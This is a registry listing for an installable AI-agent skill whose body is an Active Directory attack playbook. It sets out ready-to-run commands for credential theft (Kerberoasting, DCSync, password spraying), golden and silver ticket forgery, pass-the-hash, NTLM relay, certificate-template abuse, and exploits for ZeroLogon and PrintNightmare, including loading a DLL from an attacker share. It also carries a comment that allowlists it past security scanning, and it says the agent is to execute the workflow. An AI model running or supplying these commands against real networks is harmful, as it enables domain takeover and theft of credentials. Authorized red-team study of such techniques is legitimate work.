{"id":"c9d31cfc-0c2a-4793-8e47-bcb142d3a49e","shortId":"NC6G9d","kind":"skill","title":"active-directory-attacks","tagline":"Provide comprehensive techniques for attacking Microsoft Active Directory environments. Covers reconnaissance, credential harvesting, Kerberos attacks, lateral movement, privilege escalation, and domain dominance for red team operations and penetration testing.","description":"> AUTHORIZED USE ONLY: Use this skill only for authorized security assessments, defensive validation, or controlled educational environments.\n\n<!-- security-allowlist: credential-extraction, kerberos-attacks -->\n\n# Active Directory Attacks\n\n## Purpose\n\nProvide comprehensive techniques for attacking Microsoft Active Directory environments. Covers reconnaissance, credential harvesting, Kerberos attacks, lateral movement, privilege escalation, and domain dominance for red team operations and penetration testing.\n\n## Inputs/Prerequisites\n\n- Kali Linux or Windows attack platform\n- Domain user credentials (for most attacks)\n- Network access to Domain Controller\n- Tools: Impacket, Mimikatz, BloodHound, Rubeus, CrackMapExec\n\n## Outputs/Deliverables\n\n- Domain enumeration data\n- Extracted credentials and hashes\n- Kerberos tickets for impersonation\n- Domain Administrator access\n- Persistent access mechanisms\n\n---\n\n## Essential Tools\n\n| Tool | Purpose |\n|------|---------|\n| BloodHound | AD attack path visualization |\n| Impacket | Python AD attack tools |\n| Mimikatz | Credential extraction |\n| Rubeus | Kerberos attacks |\n| CrackMapExec | Network exploitation |\n| PowerView | AD enumeration |\n| Responder | LLMNR/NBT-NS poisoning |\n\n---\n\n## Core Workflow\n\n### Step 1: Kerberos Clock Sync\n\nKerberos requires clock synchronization (±5 minutes):\n\n```bash\n# Detect clock skew\nnmap -sT 10.10.10.10 -p445 --script smb2-time\n\n# Fix clock on Linux\nsudo date -s \"14 APR 2024 18:25:16\"\n\n# Fix clock on Windows\nnet time /domain /set\n\n# Fake 
clock without changing system time\nfaketime -f '+8h' <command>\n```\n\n### Step 2: AD Reconnaissance with BloodHound\n\n```bash\n# Start BloodHound\nneo4j console\nbloodhound --no-sandbox\n\n# Collect data with SharpHound\n.\\SharpHound.exe -c All\n.\\SharpHound.exe -c All --ldapusername user --ldappassword pass\n\n# Python collector (from Linux)\nbloodhound-python -u 'user' -p 'password' -d domain.local -ns 10.10.10.10 -c all\n```\n\n### Step 3: PowerView Enumeration\n\n```powershell\n# Get domain info\nGet-NetDomain\nGet-DomainSID\nGet-NetDomainController\n\n# Enumerate users\nGet-NetUser\nGet-NetUser -SamAccountName targetuser\nGet-UserProperty -Properties pwdlastset\n\n# Enumerate groups\nGet-NetGroupMember -GroupName \"Domain Admins\"\nGet-DomainGroup -Identity \"Domain Admins\" | Select-Object -ExpandProperty Member\n\n# Find local admin access\nFind-LocalAdminAccess -Verbose\n\n# User hunting\nInvoke-UserHunter\nInvoke-UserHunter -Stealth\n```\n\n---\n\n## Credential Attacks\n\n### Password Spraying\n\n```bash\n# Using kerbrute\n./kerbrute passwordspray -d domain.local --dc 10.10.10.10 users.txt Password123\n\n# Using CrackMapExec\ncrackmapexec smb 10.10.10.10 -u users.txt -p 'Password123' --continue-on-success\n```\n\n### Kerberoasting\n\nExtract service account TGS tickets and crack offline:\n\n```bash\n# Impacket\nGetUserSPNs.py domain.local/user:password -dc-ip 10.10.10.10 -request -outputfile hashes.txt\n\n# Rubeus\n.\\Rubeus.exe kerberoast /outfile:hashes.txt\n\n# CrackMapExec\ncrackmapexec ldap 10.10.10.10 -u user -p password --kerberoast output.txt\n\n# Crack with hashcat\nhashcat -m 13100 hashes.txt rockyou.txt\n```\n\n### AS-REP Roasting\n\nTarget accounts with \"Do not require Kerberos preauthentication\":\n\n```bash\n# Impacket\nGetNPUsers.py domain.local/ -usersfile users.txt -dc-ip 10.10.10.10 -format hashcat\n\n# Rubeus\n.\\Rubeus.exe asreproast /format:hashcat /outfile:hashes.txt\n\n# Crack with hashcat\nhashcat -m 18200 hashes.txt 
rockyou.txt\n```\n\n### DCSync Attack\n\nExtract credentials directly from DC (requires Replicating Directory Changes rights):\n\n```bash\n# Impacket\nsecretsdump.py domain.local/admin:password@10.10.10.10 -just-dc-user krbtgt\n\n# Mimikatz\nlsadump::dcsync /domain:domain.local /user:krbtgt\nlsadump::dcsync /domain:domain.local /user:Administrator\n```\n\n---\n\n## Kerberos Ticket Attacks\n\n### Pass-the-Ticket (Golden Ticket)\n\nForge TGT with krbtgt hash for any user:\n\n```powershell\n# Get krbtgt hash via DCSync first\n# Mimikatz - Create Golden Ticket\nkerberos::golden /user:Administrator /domain:domain.local /sid:S-1-5-21-xxx /krbtgt:HASH /id:500 /ptt\n\n# Impacket\nticketer.py -nthash KRBTGT_HASH -domain-sid S-1-5-21-xxx -domain domain.local Administrator\nexport KRB5CCNAME=Administrator.ccache\npsexec.py -k -no-pass domain.local/Administrator@dc.domain.local\n```\n\n### Silver Ticket\n\nForge TGS for specific service:\n\n```powershell\n# Mimikatz\nkerberos::golden /user:Administrator /domain:domain.local /sid:S-1-5-21-xxx /target:server.domain.local /service:cifs /rc4:SERVICE_HASH /ptt\n```\n\n### Pass-the-Hash\n\n```bash\n# Impacket\npsexec.py domain.local/Administrator@10.10.10.10 -hashes :NTHASH\nwmiexec.py domain.local/Administrator@10.10.10.10 -hashes :NTHASH\nsmbexec.py domain.local/Administrator@10.10.10.10 -hashes :NTHASH\n\n# CrackMapExec\ncrackmapexec smb 10.10.10.10 -u Administrator -H NTHASH -d domain.local\ncrackmapexec smb 10.10.10.10 -u Administrator -H NTHASH --local-auth\n```\n\n### OverPass-the-Hash\n\nConvert NTLM hash to Kerberos ticket:\n\n```bash\n# Impacket\ngetTGT.py domain.local/user -hashes :NTHASH\nexport KRB5CCNAME=user.ccache\n\n# Rubeus\n.\\Rubeus.exe asktgt /user:user /rc4:NTHASH /ptt\n```\n\n---\n\n## NTLM Relay Attacks\n\n### Responder + ntlmrelayx\n\n```bash\n# Start Responder (disable SMB/HTTP for relay)\nresponder -I eth0 -wrf\n\n# Start relay\nntlmrelayx.py -tf targets.txt -smb2support\n\n# LDAP relay for delegation 
attack\nntlmrelayx.py -t ldaps://dc.domain.local -wh attacker-wpad --delegate-access\n```\n\n### SMB Signing Check\n\n```bash\ncrackmapexec smb 10.10.10.0/24 --gen-relay-list targets.txt\n```\n\n---\n\n## Certificate Services Attacks (AD CS)\n\n### ESC1 - Misconfigured Templates\n\n```bash\n# Find vulnerable templates\ncertipy find -u user@domain.local -p password -dc-ip 10.10.10.10\n\n# Exploit ESC1\ncertipy req -u user@domain.local -p password -ca CA-NAME -target dc.domain.local -template VulnTemplate -upn administrator@domain.local\n\n# Authenticate with certificate\ncertipy auth -pfx administrator.pfx -dc-ip 10.10.10.10\n```\n\n### ESC8 - Web Enrollment Relay\n\n```bash\nntlmrelayx.py -t http://ca.domain.local/certsrv/certfnsh.asp -smb2support --adcs --template DomainController\n```\n\n---\n\n## Critical CVEs\n\n### ZeroLogon (CVE-2020-1472)\n\n```bash\n# Check vulnerability\ncrackmapexec smb 10.10.10.10 -u '' -p '' -M zerologon\n\n# Exploit\npython3 cve-2020-1472-exploit.py DC01 10.10.10.10\n\n# Extract hashes\nsecretsdump.py -just-dc domain.local/DC01\\$@10.10.10.10 -no-pass\n\n# Restore password (important!)\npython3 restorepassword.py domain.local/DC01@DC01 -target-ip 10.10.10.10 -hexpass HEXPASSWORD\n```\n\n### PrintNightmare (CVE-2021-1675)\n\n```bash\n# Check for vulnerability\nrpcdump.py @10.10.10.10 | grep 'MS-RPRN'\n\n# Exploit (requires hosting malicious DLL)\npython3 CVE-2021-1675.py domain.local/user:pass@10.10.10.10 '\\\\attacker\\share\\evil.dll'\n```\n\n### samAccountName Spoofing (CVE-2021-42278/42287)\n\n```bash\n# Automated exploitation\npython3 sam_the_admin.py \"domain.local/user:password\" -dc-ip 10.10.10.10 -shell\n```\n\n---\n\n## Quick Reference\n\n| Attack | Tool | Command |\n|--------|------|---------|\n| Kerberoast | Impacket | `GetUserSPNs.py domain/user:pass -request` |\n| AS-REP Roast | Impacket | `GetNPUsers.py domain/ -usersfile users.txt` |\n| DCSync | secretsdump | `secretsdump.py domain/admin:pass@DC` |\n| Pass-the-Hash | 
psexec | `psexec.py domain/user@target -hashes :HASH` |\n| Golden Ticket | Mimikatz | `kerberos::golden /user:Admin /krbtgt:HASH` |\n| Spray | kerbrute | `kerbrute passwordspray -d domain users.txt Pass` |\n\n---\n\n## Constraints\n\n**Must:**\n- Synchronize time with DC before Kerberos attacks\n- Have valid domain credentials for most attacks\n- Document all compromised accounts\n\n**Must Not:**\n- Lock out accounts with excessive password spraying\n- Modify production AD objects without approval\n- Leave Golden Tickets without documentation\n\n**Should:**\n- Run BloodHound for attack path discovery\n- Check for SMB signing before relay attacks\n- Verify patch levels for CVE exploitation\n\n---\n\n## Examples\n\n### Example 1: Domain Compromise via Kerberoasting\n\n```bash\n# 1. Find service accounts with SPNs\nGetUserSPNs.py domain.local/lowpriv:password -dc-ip 10.10.10.10\n\n# 2. Request TGS tickets\nGetUserSPNs.py domain.local/lowpriv:password -dc-ip 10.10.10.10 -request -outputfile tgs.txt\n\n# 3. Crack tickets\nhashcat -m 13100 tgs.txt rockyou.txt\n\n# 4. Use cracked service account\npsexec.py domain.local/svc_admin:CrackedPassword@10.10.10.10\n```\n\n### Example 2: NTLM Relay to LDAP\n\n```bash\n# 1. Start relay targeting LDAP\nntlmrelayx.py -t ldaps://dc.domain.local --delegate-access\n\n# 2. Trigger authentication (e.g., via PrinterBug)\npython3 printerbug.py domain.local/user:pass@target 10.10.10.12\n\n# 3. 
Use created machine account for RBCD attack\n```\n\n---\n\n## Troubleshooting\n\n| Issue | Solution |\n|-------|----------|\n| Clock skew too great | Sync time with DC or use faketime |\n| Kerberoasting returns empty | No service accounts with SPNs |\n| DCSync access denied | Need Replicating Directory Changes rights |\n| NTLM relay fails | Check SMB signing, try LDAP target |\n| BloodHound empty | Verify collector ran with correct creds |\n\n---\n\n## Additional Resources\n\nFor advanced techniques including delegation attacks, GPO abuse, RODC attacks, SCCM/WSUS deployment, ADCS exploitation, trust relationships, and Linux AD integration, see [references/advanced-attacks.md](references/advanced-attacks.md).\n\n## When to Use\nThis skill is applicable to execute the workflow or actions described in the overview.","tags":["active","directory","attacks","antigravity","awesome","skills","sickn33","agent-skills","agentic-skills","ai-agent-skills","ai-agents","ai-coding"],"capabilities":["skill","source-sickn33","skill-active-directory-attacks","topic-agent-skills","topic-agentic-skills","topic-ai-agent-skills","topic-ai-agents","topic-ai-coding","topic-ai-workflows","topic-antigravity","topic-antigravity-skills","topic-claude-code","topic-claude-code-skills","topic-codex-cli","topic-codex-skills"],"categories":["antigravity-awesome-skills"],"synonyms":[],"warnings":[],"endpointUrl":"https://skills.sh/sickn33/antigravity-awesome-skills/active-directory-attacks","protocol":"skill","transport":"skills-sh","auth":{"type":"none","details":{"cli":"npx skills add sickn33/antigravity-awesome-skills","source_repo":"https://github.com/sickn33/antigravity-awesome-skills","install_from":"skills.sh"}},"qualityScore":"0.700","qualityRationale":"deterministic score 0.70 from registry signals: · indexed on github topic:agent-skills · 34997 github stars · SKILL.md body (9,437 
chars)","verified":false,"liveness":"unknown","lastLivenessCheck":null,"agentReviews":{"count":0,"score_avg":null,"cost_usd_avg":null,"success_rate":null,"latency_p50_ms":null,"narrative_summary":null,"summary_updated_at":null},"enrichmentModel":"deterministic:skill-github:v1","enrichmentVersion":1,"enrichedAt":"2026-04-25T06:50:21.943Z","embedding":null,"createdAt":"2026-04-18T21:30:18.855Z","updatedAt":"2026-04-25T06:50:21.943Z","lastSeenAt":"2026-04-25T06:50:21.943Z","prices":[{"id":"9e349316-cc40-4ad2-8788-fb247edc47f7","listingId":"c9d31cfc-0c2a-4793-8e47-bcb142d3a49e","amountUsd":"0","unit":"free","nativeCurrency":null,"nativeAmount":null,"chain":null,"payTo":null,"paymentMethod":"skill-free","isPrimary":true,"details":{"org":"sickn33","category":"antigravity-awesome-skills","install_from":"skills.sh"},"createdAt":"2026-04-18T21:30:18.855Z"}],"sources":[{"listingId":"c9d31cfc-0c2a-4793-8e47-bcb142d3a49e","source":"github","sourceId":"sickn33/antigravity-awesome-skills/active-directory-attacks","sourceUrl":"https://github.com/sickn33/antigravity-awesome-skills/tree/main/skills/active-directory-attacks","isPrimary":false,"firstSeenAt":"2026-04-18T21:30:18.855Z","lastSeenAt":"2026-04-25T06:50:21.943Z"}],"details":{"listingId":"c9d31cfc-0c2a-4793-8e47-bcb142d3a49e","quickStartSnippet":null,"exampleRequest":null,"exampleResponse":null,"schema":null,"openapiUrl":null,"agentsTxtUrl":null,"citations":[],"useCases":[],"bestFor":[],"notFor":[],"kindDetails":{"org":"sickn33","slug":"active-directory-attacks","github":{"repo":"sickn33/antigravity-awesome-skills","stars":34997,"topics":["agent-skills","agentic-skills","ai-agent-skills","ai-agents","ai-coding","ai-workflows","antigravity","antigravity-skills","claude-code","claude-code-skills","codex-cli","codex-skills","cursor","cursor-skills","developer-tools","gemini-cli","gemini-skills","kiro","mcp","skill-library"],"license":"mit","html_url":"https://github.com/sickn33/antigravity-awesome-skills","pushed_at":"2026-04-25T06:33:17Z","description":"Installable GitHub library of 1,400+ agentic skills for Claude Code, Cursor, Codex CLI, Gemini CLI, Antigravity, and more.
Includes installer CLI, bundles, workflows, and official/community skill collections.","skill_md_sha":"8f4b6c57fed76a76d423744c82ecedc6cf02128c","skill_md_path":"skills/active-directory-attacks/SKILL.md","default_branch":"main","skill_tree_url":"https://github.com/sickn33/antigravity-awesome-skills/tree/main/skills/active-directory-attacks"},"layout":"multi","source":"github","category":"antigravity-awesome-skills","frontmatter":{"name":"active-directory-attacks","description":"Provide comprehensive techniques for attacking Microsoft Active Directory environments. Covers reconnaissance, credential harvesting, Kerberos attacks, lateral movement, privilege escalation, and domain dominance for red team operations and penetration testing."},"skills_sh_url":"https://skills.sh/sickn33/antigravity-awesome-skills/active-directory-attacks"},"updatedAt":"2026-04-25T06:50:21.943Z"}}